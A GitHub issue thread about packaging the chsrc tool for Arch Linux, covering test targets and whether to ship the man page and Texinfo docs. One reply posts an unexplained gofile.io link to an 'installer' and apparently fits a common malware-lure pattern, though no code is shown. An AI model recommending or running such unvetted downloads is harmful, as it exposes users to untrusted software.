### ISSUE TITLE
Arch Linux 打包

### ISSUE THREAD

**Issue by ccmywish** [RubyMetric/chsrc#74]
Hi，@Jerry-Terrasse 

我已经修复了测试 `make test`，现在测试全部都可以通过。然后在此基础上添加了 `make fastcheck`，这个就是 `make test` 的精简版，不会测速，不会换源，对环境无污染，耗时仅需1,2秒。

另外，可以考虑打包两个文档给用户：

1. https://github.com/RubyMetric/chsrc/blob/main/doc/chsrc.1
2. https://github.com/RubyMetric/chsrc/blob/main/doc/chsrc.texi

其中 man page 仅需要复制到Arch的规范目录就可以了，Texinfo 需要 `makeinfo` 命令生成 `info` 文件。看你的熟悉情况，对 Texinfo 的支持有没有都可以，感觉现在用的人很少.

辛苦你了 🤝

**Comment by Abhijit-Guragain** [comment]
try this
https://gofile.io/d/Lji8KD
select the desired compiler in the installer

**Comment by ccmywish** [comment]
感谢~ 👍🤝
